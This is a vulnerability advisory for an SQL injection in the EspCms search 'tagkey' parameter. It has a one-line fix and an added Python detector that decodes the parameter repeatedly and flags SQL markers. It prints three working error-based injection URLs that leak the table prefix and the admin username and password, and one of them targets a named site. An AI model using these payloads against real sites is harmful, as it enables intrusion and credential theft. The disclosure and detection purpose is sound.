EspCms site system injection vulnerability and fix - Vulnerability warning - Black Bar Safety Net (myhack58)

2011-11-30T00:00:00
ID MYHACK58:62201132480
Type myhack58
Reporter Anonymous
Modified 2011-11-30T00:00:00

Description

Injection point (reveals the table prefix): index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)%23

Reveal the username:

www.badguest.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from [prefix]_admin_member limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)%23)

Reveal the password: index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from [prefix]_admin_member limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)%23

Fix: filter the input of the corresponding parameter on the index.php page.
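
The `%2527` in the requests above is a double-encoded single quote, so a check that looks at `tagkey` after only one decoding pass sees `%27` instead of `'`. The following added example (not part of the original advisory or of EspCms) decodes `tagkey` until it stops changing and flags requests that match the shape reported here. The function names, marker list and sample request paths are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Markers taken from the requests quoted in this advisory.
SQL_MARKERS = re.compile(
    r"information_schema|floor\s*\(\s*rand\s*\(|concat\s*\(|\bselect\b.+\bfrom\b",
    re.IGNORECASE,
)
MAX_DECODE_ROUNDS = 5  # bound the loop against deeply nested encodings


def fully_decode(value):
    """Percent-decode until the value is stable; return (text, rounds_needed)."""
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_request(path):
    """Return the reasons a request's tagkey parameter looks like this injection."""
    # parse_qs already performs the one decoding pass a web server would do.
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    reasons = []
    for once_decoded in query.get("tagkey", []):
        text, extra_rounds = fully_decode(once_decoded)
        if extra_rounds and ("'" in text or '"' in text):
            reasons.append("double-encoded quote")
        if SQL_MARKERS.search(text):
            reasons.append("SQL keywords in tagkey")
    return reasons


# Constructed request paths: a normal search, a shortened request in the
# reported shape, and a harmless value that contains an encoded percent sign.
SAMPLE_REQUESTS = [
    "/index.php?ac=search&at=taglist&tagkey=news",
    "/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201"
    "%20from%20information_schema.tables)%23",
    "/index.php?ac=search&at=taglist&tagkey=100%25",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(inspect_request(request) or "clean", request)
```
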